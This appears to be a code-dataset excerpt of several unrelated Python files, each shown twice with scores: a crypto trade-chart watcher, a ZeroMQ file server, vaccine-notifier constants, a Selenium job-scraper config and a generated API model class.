self.last_tid = max([t.tid for t in self.ticks])
self.fig = plt.figure()
self.axes = self.fig.add_subplot(111)
self.bid_line, = self.axes.plot(*zip(*self.bid),
linestyle='None', marker='o', color='red')
self.ask_line, = self.axes.plot(*zip(*self.ask),
linestyle='None', marker='o', color='green')
self.axes.grid()
self.fig.canvas.draw()
self.timer_id = wx.NewId()
self.actor = self.fig.canvas.manager.frame
self.timer = wx.Timer(self.actor, id=self.timer_id)
self.timer.Start(10000) # update every 10 seconds
wx.EVT_TIMER(self.actor, self.timer_id, self.update)
pylab.show()
@property
def bid(self):
return [(t.timestamp, t.price) for t in self.ticks if t.type == u'bid']
@property
def ask(self):
return [(t.timestamp, t.price) for t in self.ticks if t.type == u'ask']
def update(self, event):
ticks = btceapi.getTradeHistory(self.symbol)
self.ticks += [t for t in ticks if t.tid > self.last_tid]
for t in ticks:
if t.tid > self.last_tid:
print("%s: %s %f at %s %f" %
(t.type, self.base, t.amount, self.alt, t.price))
self.last_tid = max([t.tid for t in ticks])
x, y = zip(*self.bid)
self.bid_line.set_xdata(x)
self.bid_line.set_ydata(y)
x, y = zip(*self.ask)
self.ask_line.set_xdata(x)
self.ask_line.set_ydata(y)
pylab.gca().relim()
pylab.gca().autoscale_view()
self.fig.canvas.draw()
if __name__ == "__main__":
symbol = "btc_usd"
try:
symbol = sys.argv[1]
except IndexError:
pass
chart = Chart(symbol) | samples/watch.py | import sys
import matplotlib
import wx
matplotlib.use("WXAgg")
matplotlib.rcParams['toolbar'] = 'None'
import matplotlib.pyplot as plt
import pylab
import btceapi
class Chart(object):
def __init__(self, symbol):
self.symbol = symbol
self.base = symbol.split("_")[0].upper()
self.alt = symbol.split("_")[1].upper()
self.ticks = btceapi.getTradeHistory(self.symbol)
self.last_tid = max([t.tid for t in self.ticks])
self.fig = plt.figure()
self.axes = self.fig.add_subplot(111)
self.bid_line, = self.axes.plot(*zip(*self.bid),
linestyle='None', marker='o', color='red')
self.ask_line, = self.axes.plot(*zip(*self.ask),
linestyle='None', marker='o', color='green')
self.axes.grid()
self.fig.canvas.draw()
self.timer_id = wx.NewId()
self.actor = self.fig.canvas.manager.frame
self.timer = wx.Timer(self.actor, id=self.timer_id)
self.timer.Start(10000) # update every 10 seconds
wx.EVT_TIMER(self.actor, self.timer_id, self.update)
pylab.show()
@property
def bid(self):
return [(t.timestamp, t.price) for t in self.ticks if t.type == u'bid']
@property
def ask(self):
return [(t.timestamp, t.price) for t in self.ticks if t.type == u'ask']
def update(self, event):
ticks = btceapi.getTradeHistory(self.symbol)
self.ticks += [t for t in ticks if t.tid > self.last_tid]
for t in ticks:
if t.tid > self.last_tid:
print("%s: %s %f at %s %f" %
(t.type, self.base, t.amount, self.alt, t.price))
self.last_tid = max([t.tid for t in ticks])
x, y = zip(*self.bid)
self.bid_line.set_xdata(x)
self.bid_line.set_ydata(y)
x, y = zip(*self.ask)
self.ask_line.set_xdata(x)
self.ask_line.set_ydata(y)
pylab.gca().relim()
pylab.gca().autoscale_view()
self.fig.canvas.draw()
if __name__ == "__main__":
symbol = "btc_usd"
try:
symbol = sys.argv[1]
except IndexError:
pass
chart = Chart(symbol) | 0.38168 | 0.203411 |
import time
import zmq
import hashlib
import os
import json
NAME_DATAFILE = "dataFiles.json" #Json que mapea hash global con lista de hashes
information_dict = {}
NAME_NAMEFILES = "nameFiles.json" #Json que mapea nombre con hash global
names_dict = {}
with open(NAME_DATAFILE, "r") as dataFiles:
information_dict = json.load(dataFiles)
with open(NAME_NAMEFILES, "r") as dataFiles:
names_dict = json.load(dataFiles)
def extraerHash(data):
result = hashlib.sha1(data)
return result.hexdigest()
def saveFile(data, hashName):
with open("archivos/" + hashName, "wb") as f:
f.write(data)
def updateJson(nameFile, jsonObj):
with open(nameFile, "w") as f:
f.write(json.dumps(jsonObj))
def downloadFile(message, socket):
nameFile = message[1].decode("utf-8")
if nameFile not in names_dict:
socket.send_multipart([b"No existe", b"i"])
else:
hash_global = names_dict[nameFile]
hashes_part = information_dict[hash_global]
for hash in hashes_part:
with open("archivos/" + hash, "rb") as f:
data = f.read()
socket.send_multipart([b"sending", data])
socket.recv_string()
socket.send_multipart([b"end", b"i"])
def uploadFile(message, socket):
nameFile = message[1].decode("utf-8")
bigHash = message[2].decode("utf-8")
hashFile = message[3].decode("utf-8")
data = message[4]
firstPart = message[5].decode("utf-8")
if firstPart == "True":
if bigHash in information_dict:
socket.send_string("Archivo duplicado")
else:
if nameFile in names_dict:
socket.send_string("Ya existe un archivo con este nombre")
else:
names_dict[nameFile] = bigHash
information_dict[bigHash] = [hashFile]
updateJson(NAME_NAMEFILES, names_dict)
updateJson(NAME_DATAFILE, information_dict)
saveFile(data, hashFile)
socket.send_string("Saved")
else:
information_dict[bigHash].append(hashFile)
updateJson(NAME_DATAFILE, information_dict)
saveFile(data, hashFile)
socket.send_string("Saved")
if __name__ == "__main__":
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:5555")
accion = ""
nombreArchivo = ""
while True:
# Wait for next request from client
message = socket.recv_multipart()
action = message[0].decode("utf-8")
#print("Action: ", action)
if action == "upload":
uploadFile(message, socket)
elif action == "download":
downloadFile(message, socket)
else:
list_names = ""
for name in names_dict:
list_names += name + "\n"
socket.send_string(list_names[:-1]) | manejador_archivos/manejador_archivos_CS/servidor/server.py | import time
import zmq
import hashlib
import os
import json
NAME_DATAFILE = "dataFiles.json" #Json que mapea hash global con lista de hashes
information_dict = {}
NAME_NAMEFILES = "nameFiles.json" #Json que mapea nombre con hash global
names_dict = {}
with open(NAME_DATAFILE, "r") as dataFiles:
information_dict = json.load(dataFiles)
with open(NAME_NAMEFILES, "r") as dataFiles:
names_dict = json.load(dataFiles)
def extraerHash(data):
result = hashlib.sha1(data)
return result.hexdigest()
def saveFile(data, hashName):
with open("archivos/" + hashName, "wb") as f:
f.write(data)
def updateJson(nameFile, jsonObj):
with open(nameFile, "w") as f:
f.write(json.dumps(jsonObj))
def downloadFile(message, socket):
nameFile = message[1].decode("utf-8")
if nameFile not in names_dict:
socket.send_multipart([b"No existe", b"i"])
else:
hash_global = names_dict[nameFile]
hashes_part = information_dict[hash_global]
for hash in hashes_part:
with open("archivos/" + hash, "rb") as f:
data = f.read()
socket.send_multipart([b"sending", data])
socket.recv_string()
socket.send_multipart([b"end", b"i"])
def uploadFile(message, socket):
nameFile = message[1].decode("utf-8")
bigHash = message[2].decode("utf-8")
hashFile = message[3].decode("utf-8")
data = message[4]
firstPart = message[5].decode("utf-8")
if firstPart == "True":
if bigHash in information_dict:
socket.send_string("Archivo duplicado")
else:
if nameFile in names_dict:
socket.send_string("Ya existe un archivo con este nombre")
else:
names_dict[nameFile] = bigHash
information_dict[bigHash] = [hashFile]
updateJson(NAME_NAMEFILES, names_dict)
updateJson(NAME_DATAFILE, information_dict)
saveFile(data, hashFile)
socket.send_string("Saved")
else:
information_dict[bigHash].append(hashFile)
updateJson(NAME_DATAFILE, information_dict)
saveFile(data, hashFile)
socket.send_string("Saved")
if __name__ == "__main__":
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:5555")
accion = ""
nombreArchivo = ""
while True:
# Wait for next request from client
message = socket.recv_multipart()
action = message[0].decode("utf-8")
#print("Action: ", action)
if action == "upload":
uploadFile(message, socket)
elif action == "download":
downloadFile(message, socket)
else:
list_names = ""
for name in names_dict:
list_names += name + "\n"
socket.send_string(list_names[:-1]) | 0.029396 | 0.08141 |
import os
COWIN_URL = os.getenv('COWIN_URL')
STATES_URL = f'{COWIN_URL}admin/location/states/'
DISTRICTS_URL = f'{COWIN_URL}admin/location/districts/'
CALENDAR_BY_DISTRICT_PUBLIC_URL = f'{COWIN_URL}appointment/sessions/public/calendarByDistrict/'
CALENDAR_BY_DISTRICT_URL = f'{COWIN_URL}appointment/sessions/calendarByDistrict/'
FIND_BY_DISTRICT_URL = f'{COWIN_URL}appointment/sessions/public/findByDistrict'
GOOGLE_GEOCODE_URL = 'https://maps.googleapis.com/maps/api/geocode/json'
GMAPS_API_KEY = os.getenv('GCP_API_KEY')
BOTH = 'both'
COVISHIELD = 'covishield'
COVAXIN = 'covaxin'
SPUTNIK = 'sputnik v'
ABOVE_18 = 'above_18'
ABOVE_45 = 'above_45'
ABOVE_18_COWIN = '18'
ABOVE_45_COWIN = '45'
WEBSITE_URL = os.getenv('WEBSITE_URL')
DB_NAME = os.getenv('DB_NAME')
ISSUE_MSG = 'There was an issue with your request, please contact the developers'
NUM_WEEKS = 1
EMAIL_SUBJECT = '%s vaccine slots available at %s - %s!'
EMAIL_BODY = f"""<html>
<body>
<p>New vaccine slot available!<br>
%s in %s on %s
</p>
<p>
Age group: %s
Vaccine: %s
</p>
<p>
Complete Address: %s<br>
Pincode %s
</p>
<p>
Cost: %s
</p>
<p>
Slots: %s
</p>
</body>
<p>
To unsubscribe from further notifications, please click here: {WEBSITE_URL}/unsubscribe?email=%s&token=%s
</p>
</html>"""
VERIFY_SUBJECT = 'Please verify your email'
VERIFY_EMAIL_BODY = f"""<html>
<body>
<p>Please verify your email here: {WEBSITE_URL}/verify_email?email=%s&token=%s
</p>
</body>
</html>"""
TEMPLATE_DATA = f"""{{
"center_name": "%s",
"slots": "%s",
"district_name": "%s",
"date": "%s",
"age_group": "%s",
"vaccine": "%s",
"address": "%s",
"pincode": "%s",
"unsub_endpoint": "%s",
"capacity": "%s",
"capacity_dose_1": "%s",
"capacity_dose_2": "%s",
"fee_amount": "%s"
}}"""
TEMPLATE_DATA_PINCODE = f"""{{
"email": "%s",
"unsub_endpoint": "%s"
}}"""
UNSUB_ENDPOINT = f"{WEBSITE_URL}/unsubscribe?email=%s&token=%s" | helpers/constants.py | import os
COWIN_URL = os.getenv('COWIN_URL')
STATES_URL = f'{COWIN_URL}admin/location/states/'
DISTRICTS_URL = f'{COWIN_URL}admin/location/districts/'
CALENDAR_BY_DISTRICT_PUBLIC_URL = f'{COWIN_URL}appointment/sessions/public/calendarByDistrict/'
CALENDAR_BY_DISTRICT_URL = f'{COWIN_URL}appointment/sessions/calendarByDistrict/'
FIND_BY_DISTRICT_URL = f'{COWIN_URL}appointment/sessions/public/findByDistrict'
GOOGLE_GEOCODE_URL = 'https://maps.googleapis.com/maps/api/geocode/json'
GMAPS_API_KEY = os.getenv('GCP_API_KEY')
BOTH = 'both'
COVISHIELD = 'covishield'
COVAXIN = 'covaxin'
SPUTNIK = 'sputnik v'
ABOVE_18 = 'above_18'
ABOVE_45 = 'above_45'
ABOVE_18_COWIN = '18'
ABOVE_45_COWIN = '45'
WEBSITE_URL = os.getenv('WEBSITE_URL')
DB_NAME = os.getenv('DB_NAME')
ISSUE_MSG = 'There was an issue with your request, please contact the developers'
NUM_WEEKS = 1
EMAIL_SUBJECT = '%s vaccine slots available at %s - %s!'
EMAIL_BODY = f"""<html>
<body>
<p>New vaccine slot available!<br>
%s in %s on %s
</p>
<p>
Age group: %s
Vaccine: %s
</p>
<p>
Complete Address: %s<br>
Pincode %s
</p>
<p>
Cost: %s
</p>
<p>
Slots: %s
</p>
</body>
<p>
To unsubscribe from further notifications, please click here: {WEBSITE_URL}/unsubscribe?email=%s&token=%s
</p>
</html>"""
VERIFY_SUBJECT = 'Please verify your email'
VERIFY_EMAIL_BODY = f"""<html>
<body>
<p>Please verify your email here: {WEBSITE_URL}/verify_email?email=%s&token=%s
</p>
</body>
</html>"""
TEMPLATE_DATA = f"""{{
"center_name": "%s",
"slots": "%s",
"district_name": "%s",
"date": "%s",
"age_group": "%s",
"vaccine": "%s",
"address": "%s",
"pincode": "%s",
"unsub_endpoint": "%s",
"capacity": "%s",
"capacity_dose_1": "%s",
"capacity_dose_2": "%s",
"fee_amount": "%s"
}}"""
TEMPLATE_DATA_PINCODE = f"""{{
"email": "%s",
"unsub_endpoint": "%s"
}}"""
UNSUB_ENDPOINT = f"{WEBSITE_URL}/unsubscribe?email=%s&token=%s" | 0.182025 | 0.056574 |
import os
from engines import peregrinbase
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class SeleniumWebForm(peregrinbase.PeregrinBase):
"""This will read an RSS feed and save the data to
Peregrin DB"""
def __init__(self):
super().__init__()
self._title = 'Selenium Web Form and Result Reader'
self._version = '0.1'
self._descr = 'Selenium class for Peregrin.'
self._engine_id = -1
self._state = 'Initialized'
def actions(self):
""" Returns a list of action and state this object can perform...
These are in a form that Peregrin can handle, and are use
by the class to limit what it allows Peregrin to call.
"""
self._actions['getItems'] = ('search', None)
return self._actions
def getItems(self):
pass
def getResults(self, uri):
pass
if __name__ == '__main__':
import sys
config_data = {}
modPath = os.path.dirname(__file__)
config_data['path'] = os.path.split(modPath)[0]
config_data['name'] = 'SeleniumWebForm'
config_data['module'] = sys.modules[__name__]
config_data['db'] = {}
config_data['db']['path'] = 'db'
config_data['db']['name'] = 'PeregrinDB.py'
config_data['config'] = {}
config_data['config']['path'] = 'config'
config_data['config']['name'] = 'PeregrinDaemon.cfg'
#load class specific items...
cls_name = 'SeleniumWebForm'
config_data[cls_name] = {}
config_data[cls_name]['uri'] = 'http://www.bctechnology.com/jobs/search.cfm'
config_data[cls_name]['data'] = []
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'business intelligence', 'id': 0})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'database', 'id': 1})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'project management', 'id': 2})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'software engineer', 'id': 3})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'strategic', 'id': 4})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'business analysis', 'id': 5})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'software selection', 'id': 6})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'erp implementation', 'id': 7})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'system integration', 'id': 8})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'quality assurance', 'id': 9})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'User experience UX', 'id': 10})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'data dataops', 'id': 11})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'dev ops devops', 'id': 12})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'fun energetic', 'id': 13})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'project coordination', 'id': 14})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'salesforce', 'id': 15})
func_name = 'getItems'
config_data[cls_name][func_name] = {}
config_data[cls_name][func_name]['form'] = {
'name': 'frm1',
'formfields': [{'id': 'keyword', 'values': '{data:keyword}'}]}
config_data[cls_name][func_name]['results'] = {
'result':{
'type': 'selector',
'name': 'class',
'value': 'darkgold',
'map':[
{'name': 'href',
'value': '{params:showid}',
'type': 'url',
'label': 'JobId'},
{'name': 'title',
'type': 'attr',
'label': 'JobTitle'}
],
'check':[
{'type':'attr',
'name':'id',
'value': 'job-title-link'}
]
},
'nextlink': {'text': 'Next ', 'type': 'a'}
}
func_name = 'getResults'
config_data[cls_name][func_name] = {}
peregrinbase.main(config_data) | engines/seleniumwebform.py | import os
from engines import peregrinbase
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class SeleniumWebForm(peregrinbase.PeregrinBase):
"""This will read an RSS feed and save the data to
Peregrin DB"""
def __init__(self):
super().__init__()
self._title = 'Selenium Web Form and Result Reader'
self._version = '0.1'
self._descr = 'Selenium class for Peregrin.'
self._engine_id = -1
self._state = 'Initialized'
def actions(self):
""" Returns a list of action and state this object can perform...
These are in a form that Peregrin can handle, and are use
by the class to limit what it allows Peregrin to call.
"""
self._actions['getItems'] = ('search', None)
return self._actions
def getItems(self):
pass
def getResults(self, uri):
pass
if __name__ == '__main__':
import sys
config_data = {}
modPath = os.path.dirname(__file__)
config_data['path'] = os.path.split(modPath)[0]
config_data['name'] = 'SeleniumWebForm'
config_data['module'] = sys.modules[__name__]
config_data['db'] = {}
config_data['db']['path'] = 'db'
config_data['db']['name'] = 'PeregrinDB.py'
config_data['config'] = {}
config_data['config']['path'] = 'config'
config_data['config']['name'] = 'PeregrinDaemon.cfg'
#load class specific items...
cls_name = 'SeleniumWebForm'
config_data[cls_name] = {}
config_data[cls_name]['uri'] = 'http://www.bctechnology.com/jobs/search.cfm'
config_data[cls_name]['data'] = []
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'business intelligence', 'id': 0})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'database', 'id': 1})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'project management', 'id': 2})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'software engineer', 'id': 3})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'strategic', 'id': 4})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'business analysis', 'id': 5})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'software selection', 'id': 6})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'erp implementation', 'id': 7})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'system integration', 'id': 8})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'quality assurance', 'id': 9})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'User experience UX', 'id': 10})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'data dataops', 'id': 11})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'dev ops devops', 'id': 12})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'fun energetic', 'id': 13})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'project coordination', 'id': 14})
config_data[cls_name]['data'].append({'name': 'keyword', 'value': 'salesforce', 'id': 15})
func_name = 'getItems'
config_data[cls_name][func_name] = {}
config_data[cls_name][func_name]['form'] = {
'name': 'frm1',
'formfields': [{'id': 'keyword', 'values': '{data:keyword}'}]}
config_data[cls_name][func_name]['results'] = {
'result':{
'type': 'selector',
'name': 'class',
'value': 'darkgold',
'map':[
{'name': 'href',
'value': '{params:showid}',
'type': 'url',
'label': 'JobId'},
{'name': 'title',
'type': 'attr',
'label': 'JobTitle'}
],
'check':[
{'type':'attr',
'name':'id',
'value': 'job-title-link'}
]
},
'nextlink': {'text': 'Next ', 'type': 'a'}
}
func_name = 'getResults'
config_data[cls_name][func_name] = {}
peregrinbase.main(config_data) | 0.349311 | 0.075961 |
import pprint
import re # noqa: F401
import six
class Member(object):
"""
Attributes:
mx_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
mx_types = {
'aggregated_at': 'str',
'connection_status': 'str',
'guid': 'str',
'identifier': 'str',
'institution_code': 'str',
'is_being_aggregated': 'bool',
'metadata': 'str',
'name': 'str',
'status': 'str',
'successfully_aggregated_at': 'str',
'user_guid': 'str'
}
attribute_map = {
'aggregated_at': 'aggregated_at',
'connection_status': 'connection_status',
'guid': 'guid',
'identifier': 'identifier',
'institution_code': 'institution_code',
'is_being_aggregated': 'is_being_aggregated',
'metadata': 'metadata',
'name': 'name',
'status': 'status',
'successfully_aggregated_at': 'successfully_aggregated_at',
'user_guid': 'user_guid'
}
def __init__(self, aggregated_at=None, connection_status=None, guid=None, identifier=None, institution_code=None, is_being_aggregated=None, metadata=None, name=None, status=None, successfully_aggregated_at=None, user_guid=None): # noqa: E501
self._aggregated_at = None
self._connection_status = None
self._guid = None
self._identifier = None
self._institution_code = None
self._is_being_aggregated = None
self._metadata = None
self._name = None
self._status = None
self._successfully_aggregated_at = None
self._user_guid = None
self.discriminator = None
if aggregated_at is not None:
self.aggregated_at = aggregated_at
if connection_status is not None:
self.connection_status = connection_status
if guid is not None:
self.guid = guid
if identifier is not None:
self.identifier = identifier
if institution_code is not None:
self.institution_code = institution_code
if is_being_aggregated is not None:
self.is_being_aggregated = is_being_aggregated
if metadata is not None:
self.metadata = metadata
if name is not None:
self.name = name
if status is not None:
self.status = status
if successfully_aggregated_at is not None:
self.successfully_aggregated_at = successfully_aggregated_at
if user_guid is not None:
self.user_guid = user_guid
@property
def aggregated_at(self):
"""Gets the aggregated_at of this Member. # noqa: E501
:return: The aggregated_at of this Member. # noqa: E501
:rtype: str
"""
return self._aggregated_at
@aggregated_at.setter
def aggregated_at(self, aggregated_at):
"""Sets the aggregated_at of this Member.
:param aggregated_at: The aggregated_at of this Member. # noqa: E501
:type: str
"""
self._aggregated_at = aggregated_at
@property
def connection_status(self):
"""Gets the connection_status of this Member. # noqa: E501
:return: The connection_status of this Member. # noqa: E501
:rtype: str
"""
return self._connection_status
@connection_status.setter
def connection_status(self, connection_status):
"""Sets the connection_status of this Member.
:param connection_status: The connection_status of this Member. # noqa: E501
:type: str
"""
self._connection_status = connection_status
@property
def guid(self):
"""Gets the guid of this Member. # noqa: E501
:return: The guid of this Member. # noqa: E501
:rtype: str
"""
return self._guid
@guid.setter
def guid(self, guid):
"""Sets the guid of this Member.
:param guid: The guid of this Member. # noqa: E501
:type: str
"""
self._guid = guid
@property
def identifier(self):
"""Gets the identifier of this Member. # noqa: E501
:return: The identifier of this Member. # noqa: E501
:rtype: str
"""
return self._identifier
@identifier.setter
def identifier(self, identifier):
"""Sets the identifier of this Member.
:param identifier: The identifier of this Member. # noqa: E501
:type: str
"""
self._identifier = identifier
@property
def institution_code(self):
"""Gets the institution_code of this Member. # noqa: E501
:return: The institution_code of this Member. # noqa: E501
:rtype: str
"""
return self._institution_code
@institution_code.setter
def institution_code(self, institution_code):
"""Sets the institution_code of this Member.
:param institution_code: The institution_code of this Member. # noqa: E501
:type: str
"""
self._institution_code = institution_code
@property
def is_being_aggregated(self):
"""Gets the is_being_aggregated of this Member. # noqa: E501
:return: The is_being_aggregated of this Member. # noqa: E501
:rtype: bool
"""
return self._is_being_aggregated
@is_being_aggregated.setter
def is_being_aggregated(self, is_being_aggregated):
"""Sets the is_being_aggregated of this Member.
:param is_being_aggregated: The is_being_aggregated of this Member. # noqa: E501
:type: bool
"""
self._is_being_aggregated = is_being_aggregated
@property
def metadata(self):
"""Gets the metadata of this Member. # noqa: E501
:return: The metadata of this Member. # noqa: E501
:rtype: str
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this Member.
:param metadata: The metadata of this Member. # noqa: E501
:type: str
"""
self._metadata = metadata
@property
def name(self):
"""Gets the name of this Member. # noqa: E501
:return: The name of this Member. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this Member.
:param name: The name of this Member. # noqa: E501
:type: str
"""
self._name = name
@property
def status(self):
"""Gets the status of this Member. # noqa: E501
:return: The status of this Member. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this Member.
:param status: The status of this Member. # noqa: E501
:type: str
"""
self._status = status
@property
def successfully_aggregated_at(self):
"""Gets the successfully_aggregated_at of this Member. # noqa: E501
:return: The successfully_aggregated_at of this Member. # noqa: E501
:rtype: str
"""
return self._successfully_aggregated_at
@successfully_aggregated_at.setter
def successfully_aggregated_at(self, successfully_aggregated_at):
"""Sets the successfully_aggregated_at of this Member.
:param successfully_aggregated_at: The successfully_aggregated_at of this Member. # noqa: E501
:type: str
"""
self._successfully_aggregated_at = successfully_aggregated_at
@property
def user_guid(self):
"""Gets the user_guid of this Member. # noqa: E501
:return: The user_guid of this Member. # noqa: E501
:rtype: str
"""
return self._user_guid
@user_guid.setter
def user_guid(self, user_guid):
"""Sets the user_guid of this Member.
:param user_guid: The user_guid of this Member. # noqa: E501
:type: str
"""
self._user_guid = user_guid
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.mx_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Member, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Member):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other | atrium/models/member.py | import pprint
import re # noqa: F401
import six
class Member(object):
"""
Attributes:
mx_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
mx_types = {
'aggregated_at': 'str',
'connection_status': 'str',
'guid': 'str',
'identifier': 'str',
'institution_code': 'str',
'is_being_aggregated': 'bool',
'metadata': 'str',
'name': 'str',
'status': 'str',
'successfully_aggregated_at': 'str',
'user_guid': 'str'
}
attribute_map = {
'aggregated_at': 'aggregated_at',
'connection_status': 'connection_status',
'guid': 'guid',
'identifier': 'identifier',
'institution_code': 'institution_code',
'is_being_aggregated': 'is_being_aggregated',
'metadata': 'metadata',
'name': 'name',
'status': 'status',
'successfully_aggregated_at': 'successfully_aggregated_at',
'user_guid': 'user_guid'
}
def __init__(self, aggregated_at=None, connection_status=None, guid=None, identifier=None, institution_code=None, is_being_aggregated=None, metadata=None, name=None, status=None, successfully_aggregated_at=None, user_guid=None): # noqa: E501
self._aggregated_at = None
self._connection_status = None
self._guid = None
self._identifier = None
self._institution_code = None
self._is_being_aggregated = None
self._metadata = None
self._name = None
self._status = None
self._successfully_aggregated_at = None
self._user_guid = None
self.discriminator = None
if aggregated_at is not None:
self.aggregated_at = aggregated_at
if connection_status is not None:
self.connection_status = connection_status
if guid is not None:
self.guid = guid
if identifier is not None:
self.identifier = identifier
if institution_code is not None:
self.institution_code = institution_code
if is_being_aggregated is not None:
self.is_being_aggregated = is_being_aggregated
if metadata is not None:
self.metadata = metadata
if name is not None:
self.name = name
if status is not None:
self.status = status
if successfully_aggregated_at is not None:
self.successfully_aggregated_at = successfully_aggregated_at
if user_guid is not None:
self.user_guid = user_guid
@property
def aggregated_at(self):
"""Gets the aggregated_at of this Member. # noqa: E501
:return: The aggregated_at of this Member. # noqa: E501
:rtype: str
"""
return self._aggregated_at
@aggregated_at.setter
def aggregated_at(self, aggregated_at):
"""Sets the aggregated_at of this Member.
:param aggregated_at: The aggregated_at of this Member. # noqa: E501
:type: str
"""
self._aggregated_at = aggregated_at
@property
def connection_status(self):
"""Gets the connection_status of this Member. # noqa: E501
:return: The connection_status of this Member. # noqa: E501
:rtype: str
"""
return self._connection_status
@connection_status.setter
def connection_status(self, connection_status):
"""Sets the connection_status of this Member.
:param connection_status: The connection_status of this Member. # noqa: E501
:type: str
"""
self._connection_status = connection_status
@property
def guid(self):
"""Gets the guid of this Member. # noqa: E501
:return: The guid of this Member. # noqa: E501
:rtype: str
"""
return self._guid
@guid.setter
def guid(self, guid):
"""Sets the guid of this Member.
:param guid: The guid of this Member. # noqa: E501
:type: str
"""
self._guid = guid
@property
def identifier(self):
"""Gets the identifier of this Member. # noqa: E501
:return: The identifier of this Member. # noqa: E501
:rtype: str
"""
return self._identifier
@identifier.setter
def identifier(self, identifier):
"""Sets the identifier of this Member.
:param identifier: The identifier of this Member. # noqa: E501
:type: str
"""
self._identifier = identifier
@property
def institution_code(self):
"""Gets the institution_code of this Member. # noqa: E501
:return: The institution_code of this Member. # noqa: E501
:rtype: str
"""
return self._institution_code
@institution_code.setter
def institution_code(self, institution_code):
"""Sets the institution_code of this Member.
:param institution_code: The institution_code of this Member. # noqa: E501
:type: str
"""
self._institution_code = institution_code
@property
def is_being_aggregated(self):
"""Gets the is_being_aggregated of this Member. # noqa: E501
:return: The is_being_aggregated of this Member. # noqa: E501
:rtype: bool
"""
return self._is_being_aggregated
@is_being_aggregated.setter
def is_being_aggregated(self, is_being_aggregated):
"""Sets the is_being_aggregated of this Member.
:param is_being_aggregated: The is_being_aggregated of this Member. # noqa: E501
:type: bool
"""
self._is_being_aggregated = is_being_aggregated
@property
def metadata(self):
"""Gets the metadata of this Member. # noqa: E501
:return: The metadata of this Member. # noqa: E501
:rtype: str
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this Member.
:param metadata: The metadata of this Member. # noqa: E501
:type: str
"""
self._metadata = metadata
@property
def name(self):
"""Gets the name of this Member. # noqa: E501
:return: The name of this Member. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this Member.
:param name: The name of this Member. # noqa: E501
:type: str
"""
self._name = name
@property
def status(self):
"""Gets the status of this Member. # noqa: E501
:return: The status of this Member. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this Member.
:param status: The status of this Member. # noqa: E501
:type: str
"""
self._status = status
@property
def successfully_aggregated_at(self):
"""Gets the successfully_aggregated_at of this Member. # noqa: E501
:return: The successfully_aggregated_at of this Member. # noqa: E501
:rtype: str
"""
return self._successfully_aggregated_at
@successfully_aggregated_at.setter
def successfully_aggregated_at(self, successfully_aggregated_at):
"""Sets the successfully_aggregated_at of this Member.
:param successfully_aggregated_at: The successfully_aggregated_at of this Member. # noqa: E501
:type: str
"""
self._successfully_aggregated_at = successfully_aggregated_at
@property
def user_guid(self):
"""Gets the user_guid of this Member. # noqa: E501
:return: The user_guid of this Member. # noqa: E501
:rtype: str
"""
return self._user_guid
@user_guid.setter
def user_guid(self, user_guid):
"""Sets the user_guid of this Member.
:param user_guid: The user_guid of this Member. # noqa: E501
:type: str
"""
self._user_guid = user_guid
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
